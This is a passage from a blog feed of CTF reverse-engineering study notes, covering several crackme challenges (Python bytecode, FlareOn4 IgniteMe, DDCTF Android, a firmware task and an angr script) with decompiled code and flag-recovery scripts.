LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> 
<span class="number">102</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">104</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">106</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">108</span> STORE_SUBSCR</span><br><span class="line"> <span class="number">110</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">112</span> LOAD_CONST <span class="number">3</span> (<span class="number">2</span>)</span><br><span class="line"> <span class="number">114</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">116</span> BINARY_MULTIPLY</span><br><span class="line"> <span class="number">118</span> LOAD_CONST <span class="number">4</span> (<span class="number">1</span>)</span><br><span class="line"> <span class="number">120</span> BINARY_ADD</span><br><span class="line"> <span class="number">122</span> STORE_SUBSCR</span><br><span class="line"> <span class="number">124</span> JUMP_ABSOLUTE <span class="number">70</span></span><br><span class="line"></span><br><span class="line"><span class="number">12</span> >> <span class="number">126</span> BUILD_LIST <span class="number">0</span></span><br><span class="line"> <span class="number">128</span> STORE_NAME <span class="number">10</span> (check)</span><br><span class="line"></span><br><span class="line"><span class="number">14</span> <span class="number">130</span> LOAD_NAME <span class="number">8</span> (<span class="built_in">range</span>)</span><br><span class="line"> <span class="number">132</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">134</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">136</span> CALL_FUNCTION <span 
class="number">1</span></span><br><span class="line"> <span class="number">138</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">140</span> GET_ITER</span><br><span class="line"> >> <span class="number">142</span> FOR_ITER <span class="number">26</span> (to <span class="number">170</span>)</span><br><span class="line"> <span class="number">144</span> STORE_NAME <span class="number">9</span> (i)</span><br><span class="line"></span><br><span class="line"><span class="number">15</span> <span class="number">146</span> LOAD_NAME <span class="number">10</span> (check)</span><br><span class="line"> <span class="number">148</span> LOAD_METHOD <span class="number">11</span> (append)</span><br><span class="line"> <span class="number">150</span> LOAD_NAME <span class="number">12</span> (<span class="built_in">ord</span>)</span><br><span class="line"> <span class="number">152</span> LOAD_NAME <span class="number">4</span> (flag)</span><br><span class="line"> <span class="number">154</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">156</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">158</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">160</span> LOAD_CONST <span class="number">5</span> (<span class="number">222</span>)</span><br><span class="line"> <span class="number">162</span> BINARY_XOR</span><br><span class="line"> <span class="number">164</span> CALL_METHOD <span class="number">1</span></span><br><span class="line"> <span class="number">166</span> POP_TOP</span><br><span class="line"> <span class="number">168</span> JUMP_ABSOLUTE <span class="number">142</span></span><br><span class="line"></span><br><span class="line"><span class="number">17</span> >> <span class="number">170</span> LOAD_NAME <span class="number">8</span> (<span class="built_in">range</span>)</span><br><span class="line"> 
<span class="number">172</span> LOAD_NAME <span class="number">5</span> (<span class="built_in">len</span>)</span><br><span class="line"> <span class="number">174</span> LOAD_NAME <span class="number">0</span> (magic)</span><br><span class="line"> <span class="number">176</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">178</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">180</span> GET_ITER</span><br><span class="line"> >> <span class="number">182</span> FOR_ITER <span class="number">34</span> (to <span class="number">218</span>)</span><br><span class="line"> <span class="number">184</span> STORE_NAME <span class="number">9</span> (i)</span><br><span class="line"></span><br><span class="line"><span class="number">18</span> <span class="number">186</span> LOAD_NAME <span class="number">10</span> (check)</span><br><span class="line"> <span class="number">188</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">190</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">192</span> LOAD_NAME <span class="number">0</span> (magic)</span><br><span class="line"> <span class="number">194</span> LOAD_NAME <span class="number">9</span> (i)</span><br><span class="line"> <span class="number">196</span> BINARY_SUBSCR</span><br><span class="line"> <span class="number">198</span> COMPARE_OP <span class="number">3</span> (!=)</span><br><span class="line"> <span class="number">200</span> POP_JUMP_IF_FALSE <span class="number">182</span></span><br><span class="line"></span><br><span class="line"><span class="number">19</span> <span class="number">202</span> LOAD_NAME <span class="number">6</span> (<span class="built_in">print</span>)</span><br><span class="line"> <span class="number">204</span> LOAD_CONST <span class="number">2</span> (<span class="string">'qwq'</span>)</span><br><span class="line"> <span 
class="number">206</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">208</span> POP_TOP</span><br><span class="line"></span><br><span class="line"><span class="number">20</span> <span class="number">210</span> LOAD_NAME <span class="number">7</span> (exit)</span><br><span class="line"> <span class="number">212</span> CALL_FUNCTION <span class="number">0</span></span><br><span class="line"> <span class="number">214</span> POP_TOP</span><br><span class="line"> <span class="number">216</span> JUMP_ABSOLUTE <span class="number">182</span></span><br><span class="line"></span><br><span class="line"><span class="number">22</span> >> <span class="number">218</span> LOAD_NAME <span class="number">6</span> (<span class="built_in">print</span>)</span><br><span class="line"> <span class="number">220</span> LOAD_CONST <span class="number">6</span> (<span class="string">'happy new year!'</span>)</span><br><span class="line"> <span class="number">222</span> CALL_FUNCTION <span class="number">1</span></span><br><span class="line"> <span class="number">224</span> POP_TOP</span><br><span class="line"> <span class="number">226</span> LOAD_CONST <span class="number">7</span> (<span class="literal">None</span>)</span><br><span class="line"> <span class="number">228</span> RETURN_VALUE</span><br></pre></td></tr></table></figure><p>Not too hard; rewriting it as Python source:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span
class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">magic = [<span class="number">178</span>, <span class="number">184</span>, <span class="number">185</span>, <span class="number">191</span>, <span class="number">182</span>, <span class="number">165</span>, <span class="number">174</span>, <span class="number">191</span>, <span class="number">129</span>, <span class="number">183</span>, <span class="number">187</span>, <span class="number">176</span>, <span class="number">129</span>, <span class="number">169</span>, <span class="number">191</span>, <span class="number">167</span>, <span class="number">163</span>]</span><br><span class="line">inp = <span class="built_in">input</span>(<span class="string">"flag>>> "</span>)</span><br><span class="line"></span><br><span class="line">flag = <span class="built_in">list</span>(inp)</span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(magic) != <span class="built_in">len</span>(flag):</span><br><span class="line">    print(<span class="string">'qwq'</span>)</span><br><span class="line">    exit(<span class="number">0</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(flag)//<span class="number">2</span>):</span><br><span class="line">        flag[i*<span class="number">2</span>],flag[i*<span class="number">2</span>+<span class="number">1</span>]=flag[i*<span class="number">2</span>+<span class="number">1</span>],flag[i*<span class="number">2</span>]</span><br><span class="line">    check=[]</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(flag)):</span><br><span class="line">        check.append(<span class="built_in">ord</span>(flag[i]) ^ <span class="number">222</span>)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(magic)):</span><br><span class="line">        <span class="keyword">if</span> check[i] != magic[i]:</span><br><span class="line">            print(<span class="string">'qwq'</span>)</span><br><span class="line">            exit(<span class="number">0</span>)</span><br><span class="line">    print(<span class="string">'happy new year!'</span>)</span><br></pre></td></tr></table></figure><p>Now the <code>exp</code> (undo the XOR, then undo the pairwise swap):</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">check=[<span class="number">178</span>, <span class="number">184</span>, <span class="number">185</span>, <span class="number">191</span>, <span class="number">182</span>, <span class="number">165</span>, <span class="number">174</span>, <span class="number">191</span>, <span class="number">129</span>, <span class="number">183</span>, <span class="number">187</span>, <span class="number">176</span>, <span class="number">129</span>, <span class="number">169</span>, <span class="number">191</span>, <span class="number">167</span>, <span class="number">163</span>]</span><br><span class="line">flag=[]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> check:</span><br><span class="line">    flag.append(<span class="built_in">chr</span>(i^<span class="number">222</span>))</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(flag)//<span class="number">2</span>):</span><br><span class="line">    flag[i*<span class="number">2</span>],flag[i*<span class="number">2</span>+<span class="number">1</span>]=flag[i*<span class="number">2</span>+<span class="number">1</span>],flag[i*<span class="number">2</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag:</span><br><span class="line">    print(i,end=<span class="string">''</span>)</span><br></pre></td></tr></table></figure><h3 id="FlareOn4-IgniteMe"><a href="#FlareOn4-IgniteMe" class="headerlink" title="FlareOn4 IgniteMe"></a>FlareOn4 IgniteMe</h3><p>The challenge really is fairly simple: go straight to the key function <code>sub_401050</code> and rename a few things:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">sub_401050</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> length; <span class="comment">// [esp+0h] [ebp-Ch]</span></span><br><span class="line"> <span class="keyword">int</span> i; <span class="comment">// [esp+4h] [ebp-8h]</span></span><br><span class="line"> <span class="keyword">unsigned</span> <span class="keyword">int</span> j; <span class="comment">// [esp+4h] [ebp-8h]</span></span><br><span
class="line"> <span class="keyword">char</span> v4; <span class="comment">// [esp+Bh] [ebp-1h]</span></span><br><span class="line"></span><br><span class="line"> length = <span class="built_in">strlen</span>((<span class="keyword">int</span>)input);</span><br><span class="line"> v4 = sub_401000();</span><br><span class="line"> <span class="keyword">for</span> ( i = length - <span class="number">1</span>; i >= <span class="number">0</span>; --i )</span><br><span class="line"> {</span><br><span class="line"> rel[i] = v4 ^ input[i];</span><br><span class="line"> v4 = input[i];</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">for</span> ( j = <span class="number">0</span>; j < <span class="number">39</span>; ++j )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( rel[j] != (<span class="keyword">unsigned</span> __int8)byte_403000[j] )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>The logic is very simple; the one thing I couldn't work out statically was the initial value of v4, and a quick run in the debugger showed it.</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210201952993.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210201952993.png" srcset="" alt="image-20210210201952993"></p><p>Now the <code>exp</code> (the cipher is a chained XOR, so decrypt from the last byte backwards):</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span
class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>{</span><br><span class="line"><span class="keyword">int</span> rel[]={<span class="number">0x0D</span>,<span class="number">0x26</span>,<span class="number">0x49</span>,<span class="number">0x45</span>,<span class="number">0x2A</span>,<span class="number">0x17</span>,<span class="number">0x78</span>,<span class="number">0x44</span>,<span class="number">0x2B</span>,<span class="number">0x6C</span>,<span class="number">0x5D</span>,<span class="number">0x5E</span>,<span class="number">0x45</span>,<span class="number">0x12</span>,<span class="number">0x2F</span>,<span class="number">0x17</span>,<span class="number">0x2B</span>,<span class="number">0x44</span>,<span class="number">0x6F</span>,<span class="number">0x6E</span>,<span class="number">0x56</span>,<span class="number">0x9</span>,<span class="number">0x5F</span>,<span class="number">0x45</span>,<span class="number">0x47</span>,<span class="number">0x73</span>,<span class="number">0x26</span>,<span class="number">0x0A</span>,<span class="number">0x0D</span>,<span class="number">0x13</span>,<span class="number">0x17</span>,<span class="number">0x48</span>,<span class="number">0x42</span>,<span class="number">0x1</span>,<span class="number">0x40</span>,<span class="number">0x4D</span>,<span class="number">0x0C</span>,<span class="number">0x2</span>,<span class="number">0x69</span>,<span class="number">0x0</span>};</span><br><span class="line"><span class="keyword">char</span> flag[<span 
class="number">40</span>];</span><br><span class="line"><span class="keyword">int</span> v4=<span class="number">4</span>;</span><br><span class="line"><span class="keyword">for</span> ( <span class="keyword">int</span> i = <span class="number">38</span>; i >= <span class="number">0</span>; --i )</span><br><span class="line">{</span><br><span class="line">flag[i] = v4 ^ rel[i];</span><br><span class="line">v4 = flag[i];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"flag{"</span><<flag<<<span class="string">'}'</span>;</span><br><span class="line">} <span class="comment">//flag{[email protected]}</span></span><br></pre></td></tr></table></figure><h3 id="BUUCTF-Firmware"><a href="#BUUCTF-Firmware" class="headerlink" title="BUUCTF Firmware"></a>BUUCTF Firmware</h3><p>这尼玛……是啥????电子取证???还是MISC???还是IOT???</p><p>我还是按照<code>MISC</code>来处理吧……它给的是内存文件,里面应该有日志,配置文件啥的……(我猜的</p><p>所以我们先分离一下:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210203337715.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210210203337715.png" srcset="" alt="image-20210210203337715"></p><p>第一个空文件夹……第二个没看出来是个啥,第三个应该跟第二个是一样的,但我解压也没搞定……最后一个没见过。</p><p>我们先看一下最后一个的文件格式:</p><blockquote><p>SquashFS 是一套基于Linux内核使用的压缩只读文件系统。该文件系统能够压缩系统内的文档,inode以及目录,文件最大支持$2^{64}$字节。</p></blockquote><p>解析这个文件格式需要用一个工具<code>firm-mod-kit</code>,但是这个东西我死活装不上!!!</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002414774.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002414774.png" srcset="" alt="image-20210211002414774"></p><p>我又尝试用<code>ubuntu</code>自带的<code>unsquashfs</code>进行解析:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002436874.png" class="lazyload" 
data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002436874.png" srcset="" alt="image-20210211002436874"></p><p>I also tried mounting the file:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002517829.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week6/image-20210211002517829.png" srcset="" alt="image-20210211002517829"></p><p>Damn!!!!</p><p>In the end I still didn't solve it... ugh!!! There are write-ups online; if you're interested, just Baidu it...</p>]]></content>
<categories>
<category> CTF study notes </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Learning RE under RX's guidance: week 5</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/</url>
<content type="html"><![CDATA[<p>Last week, because of other things (helping proofread a digital forensics book), I didn't really get to last week's challenges. Another reason is that <code>AndroidKiller</code>, the tool I use for Android reversing, broke and I never got it fixed (still not fixed as of now...); in the end I could only use Android逆向助手.</p><h3 id="DDCTF-Android-Easy"><a href="#DDCTF-Android-Easy" class="headerlink" title="DDCTF-Android Easy"></a>DDCTF-Android Easy</h3><p><code>dex2jar</code>, then <code>jd-gui</code>:</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">FlagActivity</span> <span class="keyword">extends</span> <span class="title">d</span></span></span><br><span class="line"><span class="class"></span>{</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> String m = <span class="string">"com.didi_ctf.flagapp.FlagActivity"</span>;</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">byte</span>[] p = { -<span class="number">40</span>, -<span class="number">62</span>, <span class="number">107</span>, <span class="number">66</span>, -<span class="number">126</span>, <span 
class="number">103</span>, -<span class="number">56</span>, <span class="number">77</span>, <span class="number">122</span>, -<span class="number">107</span>, -<span class="number">24</span>, -<span class="number">127</span>, <span class="number">72</span>, -<span class="number">63</span>, -<span class="number">98</span>, <span class="number">64</span>, -<span class="number">24</span>, -<span class="number">5</span>, -<span class="number">49</span>, -<span class="number">26</span>, <span class="number">79</span>, -<span class="number">70</span>, -<span class="number">26</span>, -<span class="number">81</span>, <span class="number">120</span>, <span class="number">25</span>, <span class="number">111</span>, -<span class="number">100</span>, -<span class="number">23</span>, -<span class="number">9</span>, <span class="number">122</span>, -<span class="number">35</span>, <span class="number">66</span>, -<span class="number">50</span>, -<span class="number">116</span>, <span class="number">3</span>, -<span class="number">72</span>, <span class="number">102</span>, -<span class="number">45</span>, -<span class="number">85</span>, <span class="number">0</span>, <span class="number">126</span>, -<span class="number">34</span>, <span class="number">62</span>, <span class="number">83</span>, -<span class="number">34</span>, <span class="number">48</span>, -<span class="number">111</span>, <span class="number">61</span>, -<span class="number">9</span>, -<span class="number">51</span>, <span class="number">114</span>, <span class="number">20</span>, <span class="number">81</span>, -<span class="number">126</span>, -<span class="number">18</span>, <span class="number">27</span>, -<span class="number">115</span>, -<span class="number">76</span>, -<span class="number">116</span>, -<span class="number">48</span>, -<span class="number">118</span>, -<span class="number">10</span>, -<span class="number">102</span>, -<span class="number">106</span>, <span class="number">113</span>, 
-<span class="number">104</span>, <span class="number">98</span>, -<span class="number">109</span>, <span class="number">74</span>, <span class="number">48</span>, <span class="number">47</span>, -<span class="number">100</span>, -<span class="number">88</span>, <span class="number">121</span>, <span class="number">22</span>, -<span class="number">63</span>, -<span class="number">32</span>, -<span class="number">20</span>, -<span class="number">41</span>, -<span class="number">27</span>, -<span class="number">20</span>, -<span class="number">118</span>, <span class="number">100</span>, -<span class="number">76</span>, <span class="number">70</span>, -<span class="number">49</span>, -<span class="number">39</span>, -<span class="number">27</span>, -<span class="number">106</span>, -<span class="number">13</span>, -<span class="number">108</span>, <span class="number">115</span>, -<span class="number">87</span>, -<span class="number">1</span>, -<span class="number">22</span>, -<span class="number">53</span>, <span class="number">21</span>, -<span class="number">100</span>, <span class="number">124</span>, -<span class="number">95</span>, -<span class="number">40</span>, <span class="number">62</span>, -<span class="number">69</span>, <span class="number">29</span>, <span class="number">56</span>, -<span class="number">53</span>, <span class="number">85</span>, -<span class="number">48</span>, <span class="number">25</span>, <span class="number">37</span>, -<span class="number">78</span>, <span class="number">11</span>, -<span class="number">110</span>, -<span class="number">24</span>, -<span class="number">120</span>, -<span class="number">82</span>, <span class="number">6</span>, -<span class="number">94</span>, -<span class="number">101</span> };</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="keyword">byte</span>[] q = { -<span class="number">57</span>, -<span 
class="number">90</span>, <span class="number">53</span>, -<span class="number">71</span>, -<span class="number">117</span>, <span class="number">98</span>, <span class="number">62</span>, <span class="number">98</span>, <span class="number">101</span>, -<span class="number">96</span>, <span class="number">36</span>, <span class="number">110</span>, <span class="number">77</span>, -<span class="number">83</span>, -<span class="number">121</span>, <span class="number">2</span>, -<span class="number">48</span>, <span class="number">94</span>, -<span class="number">106</span>, -<span class="number">56</span>, -<span class="number">49</span>, -<span class="number">80</span>, -<span class="number">1</span>, <span class="number">83</span>, <span class="number">75</span>, <span class="number">66</span>, -<span class="number">44</span>, <span class="number">74</span>, <span class="number">2</span>, -<span class="number">36</span>, -<span class="number">42</span>, -<span class="number">103</span>, <span class="number">6</span>, -<span class="number">115</span>, -<span class="number">40</span>, <span class="number">69</span>, -<span class="number">107</span>, <span class="number">85</span>, -<span class="number">78</span>, -<span class="number">49</span>, <span class="number">54</span>, <span class="number">78</span>, -<span class="number">26</span>, <span class="number">15</span>, <span class="number">98</span>, -<span class="number">70</span>, <span class="number">8</span>, -<span class="number">90</span>, <span class="number">94</span>, -<span class="number">61</span>, -<span class="number">84</span>, <span class="number">64</span>, <span class="number">112</span>, <span class="number">51</span>, -<span class="number">29</span>, -<span class="number">34</span>, <span class="number">126</span>, -<span class="number">21</span>, -<span class="number">126</span>, -<span class="number">71</span>, -<span class="number">31</span>, -<span class="number">24</span>, -<span 
class="number">60</span>, -<span class="number">2</span>, -<span class="number">81</span>, <span class="number">66</span>, -<span class="number">84</span>, <span class="number">85</span>, -<span class="number">91</span>, <span class="number">10</span>, <span class="number">84</span>, <span class="number">70</span>, -<span class="number">8</span>, -<span class="number">63</span>, <span class="number">26</span>, <span class="number">126</span>, -<span class="number">76</span>, -<span class="number">104</span>, -<span class="number">123</span>, -<span class="number">71</span>, -<span class="number">126</span>, -<span class="number">62</span>, -<span class="number">23</span>, <span class="number">11</span>, -<span class="number">39</span>, <span class="number">70</span>, <span class="number">14</span>, <span class="number">59</span>, -<span class="number">101</span>, -<span class="number">39</span>, -<span class="number">124</span>, <span class="number">91</span>, -<span class="number">109</span>, <span class="number">102</span>, -<span class="number">49</span>, <span class="number">21</span>, <span class="number">105</span>, <span class="number">0</span>, <span class="number">37</span>, -<span class="number">128</span>, -<span class="number">57</span>, <span class="number">117</span>, <span class="number">110</span>, -<span class="number">115</span>, -<span class="number">86</span>, <span class="number">56</span>, <span class="number">25</span>, -<span class="number">46</span>, -<span class="number">55</span>, <span class="number">7</span>, -<span class="number">125</span>, <span class="number">109</span>, <span class="number">76</span>, <span class="number">104</span>, -<span class="number">15</span>, <span class="number">82</span>, -<span class="number">53</span>, <span class="number">18</span>, -<span class="number">28</span>, -<span class="number">24</span> };</span><br><span class="line"> <span class="keyword">private</span> TextView n;</span><br><span 
class="line"> <span class="keyword">private</span> TextView o;</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">private</span> String <span class="title">i</span><span class="params">()</span></span></span><br><span class="line"><span class="function"> </span>{</span><br><span class="line"> <span class="keyword">int</span> i = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">byte</span>[] arrayOfByte1 = <span class="keyword">new</span> <span class="keyword">byte</span>[p.length];</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">int</span> j = <span class="number">0</span>; j < arrayOfByte1.length; j++)</span><br><span class="line"> arrayOfByte1[j] = (<span class="keyword">byte</span>)(p[j] ^ q[j]);</span><br><span class="line"> <span class="keyword">int</span> k = arrayOfByte1[<span class="number">0</span>];</span><br><span class="line"> <span class="keyword">int</span> i1 = <span class="number">0</span>; <span class="keyword">for</span> (; arrayOfByte1[(k + i1)] != <span class="number">0</span>; i1++); <span class="comment">// i1 declared outside the loop so it is still in scope below (decompiler output left it loop-local)</span></span><br><span class="line"> <span class="keyword">byte</span>[] arrayOfByte2 = <span class="keyword">new</span> <span class="keyword">byte</span>[i1];</span><br><span class="line"> <span class="keyword">while</span> (i < i1)</span><br><span class="line"> {</span><br><span class="line"> arrayOfByte2[i] = arrayOfByte1[(k + i)];</span><br><span class="line"> i++;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">new</span> String(arrayOfByte2);</span><br><span class="line"> }</span><br></pre></td></tr></table></figure><p>Following the logic it gives, we compute:</p><blockquote><p>arrayOfByte2="<a href="mailto:DDCTF-3ad60811d87c4a2dba0ef651b2d93476@didichuxing.com">DDCTF-3ad60811d87c4a2dba0ef651b2d93476@didichuxing.com</a>"</p><p>flag{[email protected]}</p></blockquote><h3 id="WELCOME-TO-JNI"><a 
href="#WELCOME-TO-JNI" class="headerlink" title="WELCOME TO JNI"></a>WELCOME TO JNI</h3><blockquote><p>JNI stands for Java Native Interface; through JNI, Java can call the APIs provided by the system. Operating systems, whether Linux, Windows or Mac OS, and some low-level hardware drivers written in assembly, are all written in C/C++. <strong>Unlike C/C++, Java is not compiled directly to platform machine code; it is compiled into .class files of Java bytecode that the virtual machine can run</strong>, which the JIT then compiles to native machine code just in time, so its efficiency cannot match C/C++ code. JNI solves this pain point: <strong>JNI can be described as the adapter, the middleware, through which C and Java talk to each other</strong>.</p></blockquote><p>Anyway, we still have to deal with this <code>apk</code>~</p><p>First find the entry point, then take a look in <code>jd-gui</code>:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021650803.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021650803.png" srcset="" alt="image-20210203021650803"></p><p>Following the logic in the screenshot, we now need to look for <code>loginUtils</code> in <code>native-lib</code>:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021810335.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203021810335.png" srcset="" alt="image-20210203021810335"></p><h3 id="Codegate-CTF-Redvelvet"><a href="#Codegate-CTF-Redvelvet" class="headerlink" title="Codegate CTF Redvelvet"></a>Codegate CTF Redvelvet</h3><p>According to the hint we should solve this with <code>angr</code>; in <code>IDA64</code> it is easy to see that we want <code>find 0x4015F2</code> (where the final result is printed) and <code>avoid 0x401621</code>:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203022303166.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week5/image-20210203022303166.png" srcset="" alt="image-20210203022303166"></p><p>To improve <code>angr</code>'s speed and accuracy, we set the <code>exit</code> function directly as <code>avoid</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./RedVelvet"</span>,load_options={<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>})</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find=<span class="number">0x4015f2</span>,avoid=[<span class="number">0x4007D0</span>])</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">Traceback (most recent call last):</span></span><br><span class="line"><span class="string"> File "exp.py", line 6, in <module></span></span><br><span class="line"><span class="string"> print(sim.found[0].posix.dumps(0))</span></span><br><span class="line"><span class="string">IndexError: list index out of range</span></span><br><span class="line"><span 